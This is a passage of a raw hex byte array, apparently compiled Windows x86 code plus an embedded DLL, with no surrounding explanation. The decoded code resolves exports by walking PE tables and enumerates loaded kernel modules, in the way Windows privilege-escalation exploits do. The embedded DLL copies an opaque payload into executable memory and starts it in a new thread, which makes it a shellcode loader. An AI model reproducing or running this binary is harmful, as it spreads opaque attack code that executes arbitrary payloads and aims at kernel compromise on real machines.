0xfd,0xff,0xff,0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x84,0x9c,0x00,0x00,0x00, 0x8b,0x4d,0xe4,0x51,0x8b,0x55,0xe8,0x52,0x68,0x10,0x08,0x00,0x10,0xe8,0x00,0xfa, 0xff,0xff,0x83,0xc4,0x0c,0x8b,0x45,0xe4,0x03,0x05,0x98,0x2d,0x00,0x10,0x8b,0x08, 0x89,0x4d,0xe0,0x83,0x7d,0xe0,0x00,0x75,0x02,0xeb,0xa5,0x8b,0x55,0xe0,0x03,0x15, 0xa0,0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8,0x00,0x75,0x02,0xeb, 0x8f,0x8b,0x4d,0x08,0x51,0x68,0xb0,0x21,0x00,0x10,0xe8,0xe1,0xf3,0xff,0xff,0x50, 0x8b,0x55,0xe4,0x52,0x8b,0x45,0xd8,0x50,0xe8,0x83,0xee,0xff,0xff,0x89,0x45,0xdc, 0x83,0x7d,0xdc,0x00,0x74,0x36,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd8,0x52,0xe8,0xed, 0xfc,0xff,0xff,0x8b,0x4d,0xe0,0x03,0x0d,0xa0,0x2d,0x00,0x10,0x89,0x01,0x8b,0x55, 0xdc,0x52,0x8b,0x45,0xd8,0x50,0x68,0x48,0x08,0x00,0x10,0xe8,0x82,0xf9,0xff,0xff, 0x83,0xc4,0x0c,0x8b,0x4d,0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0xe9,0x2f,0xff,0xff, 0xff,0xeb,0x0d,0x68,0x80,0x08,0x00,0x10,0xe8,0x65,0xf9,0xff,0xff,0x83,0xc4,0x04, 0xe8,0xbb,0xde,0xff,0xff,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x83,0x7d,0x08,0x00,0x74,0x26,0xc7,0x45,0xfc,0x00,0x00,0x00, 0x00,0xeb,0x09,0x8b,0x45,0xfc,0x83,0xc0,0x01,0x89,0x45,0xfc,0x8b,0x4d,0x08,0x03, 0x4d,0xfc,0x0f,0xbe,0x11,0x85,0xd2,0x74,0x02,0xeb,0xe8,0x8b,0x45,0xfc,0xeb,0x02, 0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x08,0x50,0xe8,0xb1,0xff,0xff,0xff,0x89, 0x45,0xf8,0x8b,0x4d,0x0c,0x51,0xe8,0xa5,0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55, 0xf8,0x3b,0x55,0xfc,0x74,0x07,0xb8,0x01,0x00,0x00,0x00,0xeb,0x3b,0xc7,0x45,0xf4, 0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf4,0x83,0xc0,0x01,0x89,0x45,0xf4,0x8b, 0x4d,0xf4,0x3b,0x4d,0xf8,0x73,0x1f,0x8b,0x55,0x08,0x03,0x55,0xf4,0x0f,0xbe,0x02, 0x8b,0x4d,0x0c,0x03,0x4d,0xf4,0x0f,0xbe,0x11,0x3b,0xc2,0x74,0x07,0xb8,0x01,0x00, 0x00,0x00,0xeb,0x04,0xeb,0xd0,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x0c,0x50,0xe8,0x41,0xff,0xff,0xff,0x83, 0xc0,0x01,0x89,0x45,0xfc,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d, 0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x3b,0x55,0xfc,0x73,0x12,0x8b, 0x45,0x08,0x03,0x45,0xf8,0x8b,0x4d,0x0c,0x03,0x4d,0xf8,0x8a,0x11,0x88,0x10,0xeb, 0xdd,0x8b,0x45,0x08,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x8b,0x45,0x08,0x89,0x45,0xfc,0xeb,0x09,0x8b,0x4d,0x08,0x83, 0xc1,0x01,0x89,0x4d,0x08,0x8b,0x55,0xfc,0x52,0xe8,0xe2,0xfe,0xff,0xff,0x03,0x45, 0xfc,0x39,0x45,0x08,0x77,0x26,0x8b,0x45,0x08,0x0f,0xbe,0x08,0x83,0xf9,0x41,0x7c, 0x19,0x8b,0x55,0x08,0x0f,0xbe,0x02,0x83,0xf8,0x5a,0x7f,0x0e,0x8b,0x4d,0x08,0x0f, 0xbe,0x11,0x83,0xc2,0x20,0x8b,0x45,0x08,0x88,0x10,0xeb,0xc0,0x8b,0x45,0xfc,0x8b, 0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x0f,0xb7,0x45,0x08,0x83,0xf8,0x41,0x7c,0x12,0x0f,0xb7,0x4d,0x08, 0x83,0xf9,0x5a,0x7f,0x09,0x0f,0xb7,0x45,0x08,0x83,0xc0,0x20,0xeb,0x04,0x66,0x8b, 0x45,0x08,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x08,0x0f,0xb7,0x08,0x8b,0x55,0x0c,0x0f, 0xb7,0x02,0x3b,0xc8,0x7d,0x0c,0x8b,0x4d,0x08,0x66,0x8b,0x11,0x66,0x89,0x55,0xee, 0xeb,0x0a,0x8b,0x45,0x0c,0x66,0x8b,0x08,0x66,0x89,0x4d,0xee,0x0f,0xb7,0x55,0xee, 0xd1,0xea,0x66,0x89,0x55,0xfc,0xb8,0x01,0x00,0x00,0x00,0x66,0x89,0x45,0xf8,0xeb, 0x0c,0x66,0x8b,0x4d,0xf8,0x66,0x83,0xc1,0x01,0x66,0x89,0x4d,0xf8,0x0f,0xb7,0x55, 0xf8,0x0f,0xb7,0x45,0xfc,0x3b,0xd0,0x7d,0x71,0x8b,0x4d,0x08,0x0f,0xb7,0x11,0xd1, 0xea,0x0f,0xb7,0x45,0xf8,0x2b,0xd0,0x8b,0x4d,0x08,0x8b,0x41,0x04,0x66,0x8b,0x0c, 0x50,0x66,0x89,0x4d,0xf4,0x8b,0x55,0x0c,0x0f,0xb7,0x02,0xd1,0xe8,0x0f,0xb7,0x4d, 0xf8,0x2b,0xc1,0x8b,0x55,0x0c,0x8b,0x4a,0x04,0x66,0x8b,0x14,0x41,0x66,0x89,0x55, 0xf0,0x0f,0xb6,0x45,0x10,0x85,0xc0,0x74,0x1c,0x0f,0xb7,0x4d,0xf4,0x51,0xe8,0x2d, 0xff,0xff,0xff,0x66,0x89,0x45,0xf4,0x0f,0xb7,0x55,0xf0,0x52,0xe8,0x1f,0xff,0xff, 0xff,0x66,0x89,0x45,0xf0,0x0f,0xb7,0x45,0xf4,0x0f,0xb7,0x4d,0xf0,0x3b,0xc1,0x74, 0x04,0x32,0xc0,0xeb,0x07,0xe9,0x77,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2, 0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x1c,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08, 0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x04, 0x3d,0x4c,0x01,0x00,0x00,0x75,0x17,0x8b,0x4d,0xf8,0x83,0x79,0x78,0x00,0x74,0x0c, 0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x42,0x78,0x89,0x45,0xfc,0xeb,0x3c,0x8b,0x4d, 0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa,0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08, 0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x88,0x00, 0x00,0x00,0x00,0x74,0x0f,0x8b,0x45,0xf4,0x8b,0x4d,0x08,0x03,0x88,0x88,0x00,0x00, 0x00,0x89,0x4d,0xfc,0xeb,0x04,0x33,0xc0,0xeb,0x7c,0x83,0x7d,0xfc,0x00,0x74,0x74, 0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x1c,0x89,0x45,0xf0,0x8b,0x4d,0xfc,0x8b, 0x55,0x08,0x03,0x51,0x24,0x89,0x55,0xec,0x8b,0x45,0xfc,0x8b,0x4d,0x08,0x03,0x48, 0x20,0x89,0x4d,0xe8,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xe4, 0x83,0xc2,0x01,0x89,0x55,0xe4,0x8b,0x45,0xfc,0x8b,0x4d,0xe4,0x3b,0x48,0x14,0x73, 0x33,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xe4,0x8b,0x4d,0xe8,0x8b,0x55,0x08,0x03,0x14, 0x81,0x52,0xe8,0xf9,0xfc,0xff,0xff,0x85,0xc0,0x75,0x17,0x8b,0x45,0xe4,0x8b,0x4d, 0xec,0x0f,0xbf,0x14,0x41,0x8b,0x45,0xf0,0x8b,0x4d,0x08,0x03,0x0c,0x90,0x8b,0xc1, 0xeb,0x04,0xeb,0xb9,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x84,0x00,0x00,0x00,0xc7,0x45,0xc0,0x00,0x00,0x00,0x00, 0x68,0x88,0x0c,0x00,0x10,0x8d,0x45,0xc4,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x68, 0x98,0x0c,0x00,0x10,0x8d,0x4d,0xe0,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0xc7,0x45, 0xe8,0xb4,0x0c,0x00,0x10,0xc7,0x45,0xec,0xc4,0x0c,0x00,0x10,0xc7,0x45,0xf0,0xdc, 0x0c,0x00,0x10,0xc7,0x45,0xf4,0xf4,0x0c,0x00,0x10,0xc7,0x45,0xf8,0x0c,0x0d,0x00, 0x10,0xc7,0x45,0xfc,0x28,0x0d,0x00,0x10,0xc7,0x45,0xd0,0x44,0x0d,0x00,0x10,0xc7, 0x45,0xd4,0x60,0x0d,0x00,0x10,0xc7,0x45,0xd8,0x7c,0x0d,0x00,0x10,0xc7,0x45,0xdc, 0x98,0x0d,0x00,0x10,0x6a,0x0b,0xe8,0x85,0xf4,0xff,0xff,0x89,0x45,0xcc,0x83,0x7d, 0xcc,0x00,0x0f,0x84,0xda,0x01,0x00,0x00,0x8b,0x55,0x08,0x52,0x8d,0x45,0xac,0x50, 0xff,0x15,0x18,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xac,0x51,0x8d,0x55,0xb4,0x52, 0xff,0x15,0x14,0x03,0x00,0x10,0x89,0x45,0xbc,0x83,0x7d,0xbc,0x00,0x0f,0x8c,0xa3, 0x01,0x00,0x00,0xc7,0x45,0xa8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xa8,0x83, 0xc0,0x01,0x89,0x45,0xa8,0x8b,0x4d,0xcc,0x8b,0x55,0xa8,0x3b,0x11,0x0f,0x83,0x79, 0x01,0x00,0x00,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x8d, 0x54,0x01,0x04,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x0f, 0xb7,0x44,0x01,0x1e,0x8d,0x4c,0x02,0x1c,0x51,0x8d,0x55,0x9c,0x52,0xff,0x15,0x18, 0x03,0x00,0x10,0x6a,0x01,0x8d,0x45,0x9c,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0x14, 0x03,0x00,0x10,0x89,0x45,0xa4,0x83,0x7d,0xa4,0x00,0x0f,0x8c,0x27,0x01,0x00,0x00, 0x6a,0x01,0x8d,0x55,0xc4,0x52,0x8d,0x45,0xb4,0x50,0xff,0x15,0xa0,0x02,0x00,0x10, 0x0f,0xb6,0xc8,0x85,0xc9,0x74,0x5d,0xc7,0x45,0x90,0x00,0x00,0x00,0x00,0xeb,0x09, 0x8b,0x55,0x90,0x83,0xc2,0x01,0x89,0x55,0x90,0x83,0x7d,0x90,0x06,0x7d,0x40,0x8b, 0x45,0x90,0x8b,0x4c,0x85,0xe8,0x51,0x8d,0x55,0x88,0x52,0xff,0x15,0x20,0x03,0x00, 0x10,0x6a,0x01,0x8d,0x45,0x88,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0xa0,0x02,0x00, 0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x15,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00, 0x00,0x8b,0x4d,0xcc,0x8b,0x54,0x01,0x0c,0x89,0x55,0xc0,0xeb,0x02,0xeb,0xb1,0xe9, 0xa1,0x00,0x00,0x00,0x6a,0x01,0x8d,0x45,0xe0,0x50,0x8d,0x4d,0xb4,0x51,0xff,0x15, 0xa0,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x60,0xc7,0x45,0x84,0x00,0x00, 0x00,0x00,0xeb,0x09,0x8b,0x45,0x84,0x83,0xc0,0x01,0x89,0x45,0x84,0x83,0x7d,0x84, 0x04,0x7d,0x46,0x8b,0x4d,0x84,0x8b,0x54,0x8d,0xd0,0x52,0x8d,0x85,0x7c,0xff,0xff, 0xff,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x8d,0x7c,0xff,0xff,0xff, 0x51,0x8d,0x55,0x94,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x15,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44, 0x0a,0x0c,0x89,0x45,0xc0,0xeb,0x02,0xeb,0xab,0xeb,0x2a,0x6a,0x01,0x8d,0x4d,0x94, 0x51,0x8d,0x55,0xb4,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x13,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44, 0x0a,0x0c,0x89,0x45,0xc0,0x8d,0x4d,0x94,0x51,0xff,0x15,0x10,0x03,0x00,0x10,0x83, 0x7d,0xc0,0x00,0x74,0x02,0xeb,0x05,0xe9,0x70,0xfe,0xff,0xff,0x8d,0x55,0xb4,0x52, 0xff,0x15,0x10,0x03,0x00,0x10,0x6a,0x00,0x8b,0x45,0xcc,0x50,0xff,0x15,0x90,0x02, 0x00,0x10,0x8b,0x45,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x83,0x7d,0x08,0x00,0x0f,0x85,0xc9,0x00,0x00,0x00, 0x8b,0x45,0x0c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x8b,0x51,0x0c,0x52,0x8b,0x45,0xf8, 0x8b,0x48,0x0c,0x51,0xe8,0x87,0xf0,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x07, 0x32,0xc0,0xe9,0xa4,0x00,0x00,0x00,0x8b,0x45,0xf8,0x8b,0x08,0x89,0x0d,0x18,0x2e, 0x00,0x10,0x8b,0x55,0xf8,0x8b,0x42,0x0c,0xa3,0x1c,0x2e,0x00,0x10,0x8b,0x4d,0xf8, 0x8b,0x11,0x52,0x68,0xb4,0x0d,0x00,0x10,0x8b,0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8, 0xdc,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x04,0x32,0xc0,0xeb,0x6c,0xa1, 0x18,0x2e,0x00,0x10,0x50,0x68,0xc4,0x0d,0x00,0x10,0xe8,0xf3,0xf2,0xff,0xff,0x83, 0xc4,0x08,0x68,0xf0,0x0d,0x00,0x10,0xe8,0x04,0xfd,0xff,0xff,0x89,0x45,0xfc,0x83, 0x7d,0xfc,0x00,0x74,0x33,0x8b,0x4d,0xfc,0x51,0x68,0xfc,0x0d,0x00,0x10,0xe8,0xcf, 0xf2,0xff,0xff,0x83,0xc4,0x08,0x8b,0x55,0xfc,0x52,0x68,0x28,0x0e,0x00,0x10,0x8b, 0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8,0x85,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2, 0x75,0x04,0x32,0xc0,0xeb,0x15,0xeb,0x11,0x68,0x34,0x0e,0x00,0x10,0xe8,0xa0,0xf2, 0xff,0xff,0x83,0xc4,0x04,0x32,0xc0,0xeb,0x02,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x08, 0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00, 0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, 0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, 0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0, 0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0, 0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0, 0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00, 0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00, 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00, 0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60, 0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00, 0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00, 0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0, 0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00, 0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff, 0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20, 0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8, 0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00, 0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10, 0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff, 0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe, 0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b, 0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21, 0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00, 0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45, 0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68, 0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10, 0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30, 0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d, 0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00, 0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e, 0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b, 0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15, 0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00, 0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00, 0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20, 0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8, 0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40, 0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22, 0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95, 